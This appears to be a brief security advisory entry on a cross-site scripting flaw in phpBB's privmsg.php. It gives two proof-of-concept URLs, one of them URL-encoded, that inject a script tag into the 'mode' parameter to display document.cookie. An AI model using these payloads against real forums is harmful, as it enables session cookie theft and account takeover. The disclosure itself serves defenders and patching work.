|
phpBB Privmsg.PHP Cross-Site Scripting Vulnerability
The following proof of concept has been supplied: http://www.example.com/forums/privmsg.php?mode=""><script>alert(document.cookie);</scrip t>post&u=2 William Heatley has supplied the following proof of concept: http://www.example.com/phpBB/privmsg.php?mode=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C |
|
 Privacy Statement |
